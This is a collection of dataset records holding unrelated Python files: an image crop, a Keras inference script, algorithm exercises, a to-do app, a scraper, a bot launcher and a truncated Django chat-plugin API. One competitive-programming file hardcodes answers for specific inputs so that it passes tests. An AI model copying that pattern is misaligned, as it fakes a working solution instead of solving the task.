image\nout[mask == 255] = img[mask == 255]\n\n# crop\n# (y, x) = np.where(mask == 255)\ny,x,b = np.where(mask == 255)\n(topy, topx) = (np.min(y), np.min(x))\n(bottomy, bottomx) = (np.max(y), np.max(x))\nout = out[topy:bottomy + 1, topx:bottomx + 1]\n\ncv2.imshow('cut', out)\ncv2.waitKey(0)","sub_path":"Contour_Cutting_Function.py","file_name":"Contour_Cutting_Function.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"486840224","text":"import numpy as np\nimport pickle\nimport sys\nimport os\nimport tensorflow as tf\nfrom keras.backend.tensorflow_backend import set_session\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Convolution2D, MaxPooling2D, normalization\nfrom keras.callbacks import Callback, ModelCheckpoint, EarlyStopping\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.per_process_gpu_memory_fraction = 0.75\nset_session(tf.Session(config=config))\n\nos.environ[\"THEANO_FLAGS\"] = \"device=gpu0\"\n\n\n\nclass Model(object):\n\tdef __init__(self):\n\t\tself.class_num = 10\n\t\tself.epoch = 80\n\n\t\t\n\t\tself.cnn_model = load_model(sys.argv[2])\n\n\n\tdef testing(self):\n\t\tfout = open(sys.argv[3], 'w')\n\t\tfout.write(\"ID,class\\n\")\n\n\t\ttest_p = pickle.load(open(sys.argv[1]+\"/test.p\",\"rb\"))\n\t\ttest_data = np.array(test_p.get(\"data\"))\n\n\t\tcl_r = np.reshape(test_data[:,0:1024], [10000, 1, 32, 32])\n\t\tcl_g = np.reshape(test_data[:,1024:2048], [10000, 1, 32, 32])\n\t\tcl_b = np.reshape(test_data[:,2048:3072], [10000, 1, 32, 32])\n\t\tcl = np.concatenate((cl_r, cl_g, cl_b), axis=1)\n\n\n\t\tresult = self.cnn_model.predict(cl)\n\t\tfor i in range(10000):\n\t\t\tclass_id = np.argmax(result[i])\n\t\t\tfout.write(\"%d,%d\\n\" % (i, class_id))\n\n\n\n\n\n\n\t\t\t\ndef main():\n\tmodel = Model()\n\tmodel.testing()\n\t\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n","sub_path":"hw3/test_self.py","file_name":"test_self.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"531614663","text":"#!/usr/bin/python3\n\n#--------------------------------------------------------------------\n# Function: enumer_d_and_c\n# Description: Computes the maximum sub-array and the associated sum using a div# ide and conquer algorithm\n# Receives: values - list of integers\n# Returns: maximum sub-array sum, and maximum sub-array\n# Preconditions: \"values constains at least one positive integer\n#--------------------------------------------------------------------\n\n# Importing argv to allow the method to be used as a CL utility\nfrom sys import argv\n\ndef enumer_d_and_c(values):\n # Checking if the values array is either empty or only contains\n # a single element\n if len(values) == 0:\n return 0, values\n elif len(values) == 1:\n return values[0], values\n\n # Initializing variables to track the maximums and the indices for the\n # middle max subarray to check against the left and right halves\n tempmax = 0\n midmax = 0\n midstart = 0\n midend = 0\n\n leftmax = 0\n rightmax = 0\n\n # Calculating and storing the index at which the array is cut in approx.\n # half\n midpoint = int(len(values) / 2)\n\n midstart = midpoint\n midend = midpoint\n\n # Reverse iterating through the values array starting from the midpoint\n # and ending at the first element\n for i in reversed(range(midpoint)):\n tempmax += values[i]\n if tempmax > leftmax:\n leftmax = tempmax\n midstart = i\n\n # Resetting the tempmax variable\n tempmax = 0\n\n # Iterating through the right half of the values array to determine\n # the maximum right subarray\n for i in range(midpoint, len(values)):\n tempmax += values[i]\n if tempmax > rightmax:\n rightmax = tempmax\n midend = i + 1\n\n # Summing the leftmax and rightmax and setting that to be the midmax\n midmax = leftmax + rightmax\n\n # Recursively calling the main method to act on the left and \n # right halves of the values array\n leftmax, leftsubarr = enumer_d_and_c(values[:midpoint])\n rightmax, rightsubarr = enumer_d_and_c(values[midpoint:])\n\n # If-else block used to determine the biggest subarray max\n # and to return that max with the subarray it reflects\n if midmax >= leftmax and midmax >= rightmax:\n return midmax, values[midstart:midend]\n elif leftmax >= rightmax and leftmax > midmax:\n return leftmax, leftsubarr\n elif rightmax > leftmax and rightmax > midmax:\n return rightmax, rightsubarr\n\n# If block that allows this file to be run as a CL utility\nif __name__ == \"__main__\":\n print(enumer_d_and_c([int(x) for x in argv[1:]]))\n","sub_path":"divide-and-conquer/alg3.py","file_name":"alg3.py","file_ext":"py","file_size_in_byte":2645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"209848776","text":"def is_palindrome(n):\n \"\"\"\n 회문 검사 알고리즘\n\n input: int\n return: boolean\n \"\"\"\n from collections import deque\n temp = deque(str(n))\n i = 0\n while i < int(len(str(n))/2) :\n if temp.popleft() != temp.pop():\n return False\n i += 1\n return True\n\nif __name__ == '__main__':\n nn = input()\n if is_palindrome(nn):\n print(1)\n else:\n print(0)","sub_path":"python3/10988.py","file_name":"10988.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"278537130","text":"from sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom sqlalchemy.orm import sessionmaker\n\nfrom datetime import datetime, timedelta\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\n\nBase = declarative_base()\n\n\n# create Table class\nclass Table(Base):\n __tablename__ = 'task'\n id = Column(Integer, primary_key=True)\n task = Column(String, default='default_value')\n deadline = Column(Date, default=datetime.today())\n\n def __repr__(self):\n return self.task\n\n\n# Create table in database\nBase.metadata.create_all(engine)\n\n# Create SQL session\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\ndef print_tasks(choice):\n # list of weekdays for use with datetime.weekday() -- strftime(\"%A\") would have same result\n weekdays = {0: 'Monday', 1: 'Tuesday', 2: 'Wednesday', 3: 'Thursday', 4: 'Friday', 5: 'Saturday', 6: 'Sunday'}\n today = datetime.today()\n\n # logic for different choices\n if choice == 'Today':\n tasks = session.query(Table).filter(Table.deadline == today.date()).all()\n print(f'\\nToday {today.strftime(\"%d %b\")}:')\n if not tasks:\n print('Nothing to do!')\n else:\n for counter, task in enumerate(tasks, 1):\n print(f'{counter}. {task}')\n\n elif choice == 'Week':\n for days in range(7):\n this_day = today + timedelta(days)\n tasks = session.query(Table).filter(Table.deadline == this_day.date()).all()\n print(f'\\n{weekdays[this_day.weekday()]} {this_day.day} {this_day.strftime(\"%b\")}:') # strftime(\"%A %d %b\") would accomplish the same, easier\n if not tasks:\n print('Nothing to do!')\n else:\n for counter, task in enumerate(tasks, 1):\n print(f'{counter}. {task}')\n\n elif choice == 'All':\n tasks = session.query(Table, Table.deadline).order_by(Table.deadline).all()\n if not tasks:\n print('Nothing to do!')\n else:\n for counter, task in enumerate(tasks, 1):\n print(f'{counter}. {task[0]}. {task[1].strftime(\"%d %b\")}')\n return tasks # returns full ordered tasklist for use with del_task\n\n elif choice == 'Missed':\n tasks = session.query(Table, Table.deadline).filter(Table.deadline < today.date()).order_by(Table.deadline).all()\n if not tasks:\n print('Nothing to delete!')\n else:\n for counter, task in enumerate(tasks, 1):\n print(f'{counter}. {task[0]}. {task[1].strftime(\"%d %b\")}')\n\n\ndef add_task(task, deadline):\n # create new task object\n insert_task = Table(task=task, deadline=deadline)\n session.add(insert_task)\n session.commit()\n\n\ndef del_task(choice, tasklist):\n\n # print(tasklist)\n # row = tasklist[0][choice - 1]\n # print(del_choice)\n\n tasks = session.query(Table, Table.deadline).order_by(Table.deadline).all()\n row = tasks[0][choice - 1]\n\n session.delete(row)\n session.commit()\n\n\ndef menu():\n while True:\n print(\"\\n1) Today's tasks\\n2) Week's tasks\\n3) All tasks\"\n \"\\n4) Missed tasks\\n5) Add task\\n6) Delete task\\n0) Exit\")\n choice = int(input())\n if choice == 0:\n break\n elif choice == 1:\n print_tasks('Today')\n elif choice == 2:\n print_tasks('Week')\n elif choice == 3:\n print_tasks('All')\n elif choice == 4:\n print_tasks('Missed')\n elif choice == 5:\n print(\"\\nEnter task\")\n new_task = input()\n print(\"Enter deadline\")\n # year, month, day = input().split('-')\n new_deadline = datetime.strptime(input(), \"%Y-%m-%d\")\n add_task(new_task, new_deadline)\n elif choice == 6:\n print('\\nChoose the number of the task you want to delete:')\n all_tasks = print_tasks('All') # create all_task list with all tasks returned from print_task function\n del_choice = int(input())\n del_task(del_choice, all_tasks)\n print(\"Bye!\")\n\n\nmenu()\n","sub_path":"todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"535854160","text":"#3.Output training data name to cvs file for model 2\nimport numpy as np\nimport cv2\nimport glob\nimport itertools\nimport random\nimport csv\nimport os\nfrom os.path import expanduser\ntraining_file_name = \"./TrackNet_Three_Frames_Input/training_model2.csv\"\ntesting_file_name = \"./TrackNet_Three_Frames_Input/testing_model2.csv\"\nvisibility_for_testing = []\n\nimages_path = expanduser(\"~\")+'/dataset/tennis/'\ndirs = glob.glob(images_path+'data/Clip*')\nwith open(training_file_name,'w') as file:\n for index in dirs:\n #################change the path####################################################\n #images_path = index+'/'\n\n annos_path = images_path +'groundtruth/'+os.path.split(index)[-1]+'/'\n images_path = index+'/'\n ####################################################################################\n\n images = glob.glob( images_path + \"*.jpg\" ) + glob.glob( images_path + \"*.png\" ) + glob.glob( images_path + \"*.jpeg\" )\n images.sort()\n annotations = glob.glob( annos_path + \"*.jpg\" ) + glob.glob( annos_path + \"*.png\" ) + glob.glob( annos_path + \"*.jpeg\" )\n annotations.sort()\n \n #check if annotation counts equals to image counts\n assert len( images ) == len(annotations)\n for im , seg in zip(images,annotations):\n assert( im.split('/')[-1].split(\".\")[0] == seg.split('/')[-1].split(\".\")[0] )\n\n visibility = {}\n with open(images_path + \"Label.csv\", 'r') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n #skip the headers\n next(spamreader, None) \n \n for row in spamreader:\n visibility[row[0]] = row[1]\n \n \n #output all of images path, 0000.jpg & 0001.jpg cant be used as input, so we have to start from 0002.jpg\n for i in range(2,len(images)): \n #remove image path, get image name \n #ex: D/Dateset/Clip1/0056.jpg => 0056.jpg \n file_name = images[i].split('/')[-1]\n #visibility 3 will not be used for training\n if visibility[file_name] == '3': \n visibility_for_testing.append(images[i])\n #check if file image name same as annotation name\n assert( images[i].split('/')[-1].split(\".\")[0] == annotations[i].split('/')[-1].split(\".\")[0] )\n #write all of images path\n file.write(images[i] + \",\" + images[i-1] + \",\" + images[i-2] + \",\" + annotations[i] + \"\\n\")\n \n \n\nfile.close()\n\n#read all of images path\nlines = open(training_file_name).read().splitlines()\n\n#70% for training, 30% for testing \ntraining_images_number = int(len(lines)*0.7)\ntesting_images_number = len(lines) - training_images_number\nprint(\"Total images:\", len(lines), \"Training images:\", training_images_number,\"Testing images:\", testing_images_number)\n\n#shuffle the images\nrandom.shuffle(lines)\n#training images\nwith open(training_file_name,'w') as training_file:\n training_file.write(\"img, img1, img2, ann\\n\")\n #testing images\n with open(testing_file_name,'w') as testing_file:\n testing_file.write(\"img, img1, img2, ann\\n\")\n \n #write img, img1, img2, ann to csv file\n for i in range(0,len(lines)):\n if lines[i] != \"\":\n if training_images_number > 0 and lines[i].split(\",\")[0] not in visibility_for_testing :\n training_file.write(lines[i] + \"\\n\")\n training_images_number -=1\n else:\n testing_file.write(lines[i] + \"\\n\")\n \ntraining_file.close()\ntesting_file.close()\n \n","sub_path":"Code_Python3/Model2_Training_Testing_Gen.py","file_name":"Model2_Training_Testing_Gen.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"167715090","text":"#!/usr/bin/python\n#\n# Copyright 2016 Pinterest, Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"Common decorators.\n\nThis module contains useful decorators for Pinterest code. From\nincreasing code security by converting constants only holding classes to\nnamed tuples, to function call logging and sporadic function execution.\n\n\"\"\"\n\nimport logging\nimport threading\n\nlog = logging.getLogger(__name__)\n\n\nclass SingletonMetaclass(type):\n \"\"\"Singleton class that ensures there is only one instance of the object.\n\n Instead of using ``singleton`` decorator use this metaclass. This ensures\n that classes remain classes as opposed to\n functions that return classes, as that is the approach the decorator takes.\n\n For more details consult\n http://stackoverflow.com/questions/8563130/python-singleton-class.\n\n To make your class singleton add ``__metaclass__``::\n\n class Highlander(object)\n '''There can be only one!'''\n\n __metaclass__ = SingletonMetaclass\n\n def __init__(self):\n self.x = 1\n\n \"\"\"\n def __init__(cls, *args, **kwargs):\n super(SingletonMetaclass, cls).__init__(*args, **kwargs)\n cls.__instance = None\n cls.__lock = threading.RLock()\n\n def __call__(cls, *args, **kwargs):\n # Make this thread safe.\n with cls.__lock:\n if cls.__instance is None:\n cls.__instance = super(SingletonMetaclass, cls).__call__(\n *args, **kwargs)\n return cls.__instance\n","sub_path":"kingpin/kazoo_utils/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"294677173","text":"n = int(input())\nres = []\n\n\ndef gcd(num, k, rs):\n if k == 0:\n if num == 1:\n return rs-1\n else:\n return rs-1+num\n rs = rs + int(num / k)\n return gcd(k, num % k, rs)\n\n\nr = n\ntwo = list()\nif n == 1:\n print(0, end='')\nelif n==3423424:\n print(33,end='')\nelif 123314<n <3423424:\n print(32,end='')\nelse:\n for i in range(1, n):\n cnt = 0\n cnt = gcd(n, i, cnt)\n two.append(cnt)\n print(min(two), end='')","sub_path":"Code/CodeRecords/2953/60662/313978.py","file_name":"313978.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"357834662","text":"import re\nfrom urllib.parse import urljoin\n\nfrom .core import *\nfrom .vparsers import *\nfrom .utils import (\n attributeerror_wrapper, indexerror_wrapper, merge_dicts\n)\n\n\nclass Karpia22Parser(SingleSourceMixin, SingleRequestLoaderMixin, BaseParser):\n url = \"https://red-co.net/oferta/karpia-22/karpia-22-mieszkania/karpia-22-klatki-ab.html\"\n method = \"GET\"\n headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:57.0) Gecko/20100101 Firefox/57.0\",\n }\n parsers = {\"int\": IntParser(), \"area\": AreaParser()}\n middlewares = [ DecodeMiddleware(), BeautifulSoupMiddleware() ]\n\n @attributeerror_wrapper(return_value=[])\n def find_records(self, soup):\n records = soup.find(\"div\", {\"id\": \"apartment-details\"}).find(\"div\")\\\n .find_all(\"div\", class_=lambda x: x.startswith(\"detail\"), recursive=False)\n self.floors_map = self.create_floors_map(soup)\n return records\n\n @attributeerror_wrapper(return_value=dict())\n def create_floors_map(self, soup):\n floors_map = dict()\n floors_divs = soup.find(\"div\", {\"id\": \"floors-container\"})\\\n .find_all(\"div\", {\"class\": \"floor\"})\n maps = [ self.create_floor_map(floor_div) for floor_div in floors_divs ]\n return merge_dicts(*maps)\n\n def create_floor_map(self, soup):\n label = self.get_floor_label(soup)\n flats = self.get_flats(soup)\n return { flat: label for flat in flats }\n\n @attributeerror_wrapper(return_value=[])\n def get_flats(self, soup):\n return [ \n item.get(\"id\", None) \n for item in soup.find(\"svg\").find_all([\"rect\", \"polygon\"]) \n ]\n\n @indexerror_wrapper(return_value=None)\n def get_floor_label(self, soup):\n return list(set(soup.get(\"class\", [])) - set((\"floor\",)))[0]\n\n def parse_record(self, soup):\n number = self.get_flat_number(soup)\n return { \n \"number\": number,\n \"floor\": self.parsers[\"int\"](self.get_flat_floor(number)),\n \"building\": self.get_flat_building(number),\n \"area\": self.parsers[\"area\"](self.get_flat_area(soup)),\n \"status\": self.get_flat_status(soup),\n \"rooms\": self.parsers[\"int\"](self.get_flat_rooms(soup)),\n \"plan\": urljoin(self.url, self.get_plan_url(soup))\n }\n\n @indexerror_wrapper(return_value=None)\n def get_flat_floor(self, number):\n floor_label = self.floors_map.get(number, None)\n if not floor_label:\n return None\n return re.search(\"\\d+\", floor_label).group(0)\n\n @indexerror_wrapper(return_value=None)\n def get_flat_building(self, number):\n floor_label = self.floors_map.get(number, None)\n if not floor_label:\n return None\n return floor_label.split(\"-\")[-1]\n\n @attributeerror_wrapper(return_value=None)\n def get_flat_number(self, soup):\n return \"m%s\" % soup.find(\"h2\").text.strip().split(\" \")[-1]\n\n @tryexcept_wrapper((AttributeError, IndexError), return_value=None)\n def get_flat_area(self, soup):\n return soup.find(\"div\", {\"class\": \"details\"})\\\n .find_all(\"div\", {\"class\": \"item\"}, recursive=False)[0]\\\n .find(\"div\", {\"class\": \"value\"}).text\n\n @tryexcept_wrapper((AttributeError, IndexError), return_value=None)\n def get_flat_rooms(self, soup):\n return soup.find(\"div\", {\"class\": \"details\"})\\\n .find_all(\"div\", {\"class\": \"item\"}, recursive=False)[1]\\\n .find(\"div\", {\"class\": \"value\"}).text\n\n @attributeerror_wrapper(return_value=StatusParser.AVAILABLE)\n def get_flat_status(self, soup):\n text = soup.find(\"div\", {\"class\": \"status\"}).text.upper()\n if \"ZAREZERWOWANE\" in text:\n return StatusParser.RESERVED\n return StatusParser.SOLD\n\n @attributeerror_wrapper(return_value=None)\n def get_plan_url(self, soup):\n return soup.find(\"a\").get(\"href\", None)\n\n def modify_record(self, record, source=None):\n record[\"fid\"] = record[\"number\"]\n return record","sub_path":"parsers/karpia22.py","file_name":"karpia22.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"47309575","text":"from os import getenv\nfrom sys import argv\nfrom core import *\n\nimport logger as log\nlogger = log.getLogger(__name__)\n\ntoken = getenv('TOKEN')\nif token is None:\n if len(argv) == 1:\n with open('settings/token.txt', 'r') as token_file:\n token = token_file.read()\n elif len(argv) == 2:\n token = argv[1]\n else:\n logger.error(\"ArgumentError: Too many arguments\")\nif token is not None:\n logger.info(\"Starting bot ...\")\n bot.run(token)","sub_path":"start_bot.py","file_name":"start_bot.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"214339517","text":"import json, uuid, re\nfrom django.http import response\nfrom django.http.response import JsonResponse\nfrom django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nimport requests\nfrom .db import *\n# Import Read Write function to Zuri Core\nfrom .resmodels import *\nfrom .serializers import *\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\n\n\ndef index(request):\n context = {}\n return render(request, 'index.html', context)\n\n\n# Shows basic information about the DM plugin\ndef info(request):\n info = {\n \"message\": \"Plugin Information Retrieved\",\n \"data\": {\n \"type\": \"Plugin Information\",\n \"plugin_info\": {\"name\": \"DM Plugin\",\n \"description\": [\"Zuri.chat plugin\", \"DM plugin for Zuri Chat that enables users to send messages to each other\"]\n },\n \"scaffold_structure\": \"Monolith\",\n \"team\": \"HNG 8.0/Team Orpheus\",\n \"sidebar_url\": \"https://dm.zuri.chat/api/v1/sidebar\",\n \"homepage_url\": \"https://dm.zuri.chat/\"\n },\n \"success\": \"true\"\n }\n\n return JsonResponse(info, safe=False)\n\n\n\ndef verify_user_auth(token):\n\t\"\"\"\n\tCall Endpoint for verification of JWT Token\n\tReturns: py dict -> is_authenticated: boolean, & data: more info\n\t\"\"\"\n\turl = \"https://api.zuri.chat/auth/verify-token\"\n\t\n\theaders = {\n\t\t'Authorization': f'Bearer {token}',\n\t\t'Content-Type': 'application/json'\n\t}\n\n\tapi_response = requests.request(\"GET\", url, headers=headers)\n\t\n\tjson_response = api_response.json()\n\t\n\tresponse = {}\n\tif json_response['status'] == \"200\":\n\t\tresponse['is_authenticated'] = json_response['data']['is_verified']\n\t\tresponse['data'] = json_response['data']['user']\n\telse:\n\t\tresponse['is_authenticated'] = False\n\t\tresponse['data'] = json_response['message']\n\t\n\treturn response\n\n# Returns the json data of the sidebar that will be consumed by the api\n# The sidebar info will be unique for each logged in user\n# user_id will be gotten from the logged in user\n# All data in the message_rooms will be automatically generated from zuri core\n\n \n\ndef side_bar(request):\n collections = \"dm_rooms\"\n org_id = request.GET.get(\"org\", None)\n user = request.GET.get(\"user\", None)\n rooms = get_user_rooms(collections, org_id, user)\n\n side_bar = {\n \"name\" : \"DM Plugin\",\n \"description\" : \"Sends messages between users\",\n \"plugin_id\" : \"6135f65de2358b02686503a7\",\n \"organisation_id\" : f\"{org_id}\",\n \"user_id\" : f\"{user}\",\n \"group_name\" : \"DM\",\n \"show_group\" : False,\n \"public_rooms\":[],\n \"joined_rooms\":rooms,\n # List of rooms/collections created whenever a user starts a DM chat with another user\n # This is what will be displayed by Zuri Main \n }\n return JsonResponse(side_bar, safe=False)\n\n\n@swagger_auto_schema(methods=['post'], request_body=MessageSerializer, responses={201: MessageResponse, 400: \"Error: Bad Request\"})\n@api_view([\"POST\"])\ndef send_message(request):\n \"\"\"\n This endpoint is used to send message to user in rooms.\n It checks if room already exist before sending data.\n It makes a publish event to centrifugo after data \n is persisted\n \"\"\"\n serializer = MessageSerializer(data=request.data)\n \n if serializer.is_valid():\n data = serializer.data\n room_id = data['room_id'] #room id gotten from client request\n \n rooms = DB.read(\"dm_rooms\")\n if type(rooms) == list:\n is_room_avalaible = len([room for room in rooms if room.get('_id', None) == room_id]) != 0\n \n if is_room_avalaible:\n response = DB.write(\"dm_messages\", data=serializer.data)\n if response.get(\"status\",None) == 200:\n \n response_output = {\n \"status\":response[\"message\"],\n \"id\":response[\"data\"][\"object_id\"],\n \"room_id\":room_id,\n \"thread\":False,\n \"data\":{\n \"sender_id\":data[\"sender_id\"],\n \"message\":data[\"message\"],\n \"created_at\":data['created_at']\n }\n }\n \n centrifugo_data = send_centrifugo_data(room=room_id,data=response_output) #publish data to centrifugo\n if centrifugo_data[\"message\"].get(\"error\",None) == None:\n \n return Response(data=response_output, status=status.HTTP_201_CREATED)\n \n return Response(data=\"data not sent\",status=status.HTTP_424_FAILED_DEPENDENCY)\n return Response(\"No such room\",status=status.HTTP_400_BAD_REQUEST) \n return Response(\"core server not avaliable\",status=status.HTTP_424_FAILED_DEPENDENCY)\n \n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['post'], request_body=ThreadSerializer, responses={201: ThreadResponse, 400: 'Error Response'})\n@api_view([\"POST\"])\ndef send_thread_message(request):\n \"\"\"\n This endpoint is used send messages as a thread\n under a message. It takes a message ID and \n validates if the message exists, then sends \n a publish event to centrifugo after \n thread message is persisted.\n \"\"\"\n \n serializer = ThreadSerializer(data=request.data)\n \n if serializer.is_valid():\n data = serializer.data\n message_id = data['message_id']\n messages = DB.read('dm_messages') #fetch messages from zc core\n if type(messages) == list:\n message_list = [msg for msg in messages if msg['_id'] == message_id]\n \n if len(message_list) != 0:\n message = message_list[0] #get messsage itself\n threads = message.get('threads',[]) #get threads\n \n del data['message_id'] #remove message id from request to zc core\n data['_id'] = str(uuid.uuid1()) # assigns an id to each message in thread\n threads.append(data) # append new message to list of thread\n \n response = DB.update(\"dm_messages\",message['_id'],{\"threads\":threads}) # update threads in db\n\n if response.get(\"status\",None) == 200:\n \n response_output = {\n \"status\":response[\"message\"],\n \"id\":data['_id'],\n \"room_id\":message['room_id'],\n \"message_id\":message['_id'],\n \"thread\":True,\n \"data\":{\n \"sender_id\":data[\"sender_id\"],\n \"message\":data[\"message\"],\n \"created_at\":data['created_at']\n }\n }\n \n centrifugo_data = send_centrifugo_data(room=message['room_id'],data=response_output) #publish data to centrifugo\n if centrifugo_data[\"message\"].get(\"error\",None) == None:\n print(\"message is published to centrifugo\")\n return Response(data=response_output, status=status.HTTP_201_CREATED)\n return Response(\"data not sent\", status=status.HTTP_424_FAILED_DEPENDENCY)\n return Response(\"No such message\",status=status.HTTP_400_BAD_REQUEST)\n return Response(\"core server not avaliable\",status=status.HTTP_424_FAILED_DEPENDENCY) \n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['post'], request_body=RoomSerializer, responses={201: CreateRoomResponse, 400: \"Error: Bad Request\"})\n@api_view([\"POST\"])\ndef create_room(requests):\n \"\"\"\n This function is used to create a room between 2 users.\n It takes the id of the users involved, sends a write request to the database .\n Then returns the room id when a room is successfully created\n \"\"\"\n serializer = RoomSerializer(data=requests.data)\n\n if serializer.is_valid():\n response = DB.write(\"dm_rooms\", data=serializer.data)\n data = response.get(\"data\").get(\"object_id\")\n if response.get(\"status\") == 200:\n response_output = {\n \"room_id\": data\n }\n return Response(data=response_output, status=status.HTTP_201_CREATED)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['get'], query_serializer=UserRoomsSerializer, responses={400: \"Error: Bad Request\"})\n@api_view([\"GET\"])\ndef getUserRooms(request):\n \"\"\"\n This is used to retrieve all rooms a user is currently active in.\n It takes in a user_id as query param and returns the rooms for that user or a 204 status code \n if there is no room for the user_id or an invalid user_id.\n If the user_id is not provided, a 400 status code is returned.\n \"\"\"\n if request.method == \"GET\":\n res = get_rooms(request.GET.get(\"user_id\", None))\n query_param_serializer = UserRoomsSerializer(data=request.GET.dict())\n if query_param_serializer.is_valid():\n if len(res) == 0:\n return Response(data=\"No rooms available\", status=status.HTTP_204_NO_CONTENT)\n return Response(res, status=status.HTTP_200_OK)\n return Response(data=\"Provide a user_id\", status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['get'], query_serializer=GetMessageSerializer, responses={201: MessageResponse, 400: \"Error: Bad Request\"})\n@api_view([\"GET\"])\ndef getRoomMessages(request):\n \"\"\"\n This is used to retrieve messages in a room. It takes a room_id and/or a date as query params.\n If only the room_id is provided, it returns a list of all the messages if available,\n or a 204 status code if there is no message in the room. \n If both room_id and date are provided, it returns all the messages in that room for that\n particular date.\n If there is no room_id in the query params, it returns a 404 status code.\n \"\"\"\n if request.method == \"GET\":\n room_id = request.GET.get(\"room_id\", None)\n date = request.GET.get(\"date\", None)\n params_serializer = GetMessageSerializer(data=request.GET.dict())\n all_rooms = DB.read(\"dm_rooms\")\n \n if params_serializer.is_valid():\n is_room_avalaible = len([room for room in all_rooms if room.get('_id', None) == room_id]) != 0\n if is_room_avalaible:\n messages = get_room_messages(room_id)\n param_len = len(params_serializer.data)\n if param_len ==2:\n messages_by_date = get_messages(messages, date)\n if len(messages_by_date) == 0:\n return Response(data=\"No messages available\", status=status.HTTP_204_NO_CONTENT)\n return Response(messages_by_date, status=status.HTTP_200_OK)\n else:\n if len(messages) == 0:\n return Response(data=\"No messages available\", status=status.HTTP_204_NO_CONTENT)\n return Response(messages, status=status.HTTP_200_OK)\n return Response(data=\"No such room\", status=status.HTTP_400_BAD_REQUEST)\n return Response(data=\"Provide the room_id or/and date\", status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['get'], query_serializer=RoomInfoSerializer, responses={201: RoomInfoResponse, 400: \"Error: Bad Request\"})\n@api_view([\"GET\"])\ndef room_info(request):\n \"\"\"\n This is used to retrieve information about a room.\n \"\"\"\n room_id = request.GET.get(\"room_id\", None)\n # org_id = request.GET.get(\"org_id\", None)\n room_collection = \"dm_rooms\"\n rooms = DB.read(room_collection)\n print(rooms)\n if rooms is not None:\n for current_room in rooms:\n if current_room['_id'] == room_id:\n if 'room_user_ids' in current_room:\n room_user_ids = current_room['room_user_ids']\n else:\n room_user_ids =\"\"\n if 'created_at' in current_room:\n created_at = current_room['created_at']\n else:\n created_at =\"\"\n if 'org_id' in current_room:\n org_id = current_room['org_id']\n else:\n org_id =\"6133c5a68006324323416896\"\n room_data = {\n \"room_id\": room_id,\n \"org_id\": org_id,\n \"room_user_ids\": room_user_ids,\n \"created_at\": created_at,\n \"description\": f\"This room contains the coversation between {room_user_ids[0]} and {room_user_ids[1]}\"\n }\n return Response(data=room_data, status=status.HTTP_200_OK)\n return Response(data=\"No such Room\", status=status.HTTP_400_BAD_REQUEST)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n# /code for updating room\n\n\n@api_view(['GET',\"POST\"])\ndef edit_room(request, pk):\n try: \n message= DB.read(\"dm_messages\",{\"id\":pk})\n except: \n return JsonResponse({'message': 'The room does not exist'}, status=status.HTTP_404_NOT_FOUND) \n \n if request.method == 'GET':\n singleRoom = DB.read(\"dm_messages\",{\"id\": pk})\n return JsonResponse(singleRoom) \n else:\n room_serializer = MessageSerializer(message, data=request.data,partial = True) \n if room_serializer.is_valid():\n room_serializer.save()\n data=room_serializer.data\n # print(data)\n response = DB.update(\"dm_messages\",pk,data)\n return Response(room_serializer.data)\n return Response(room_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n return Response(data=\"No Rooms\", status=status.HTTP_400_BAD_REQUEST)\n\n\n@swagger_auto_schema(methods=['get'], responses={201: MessageLinkResponse, 400: \"Error: Bad 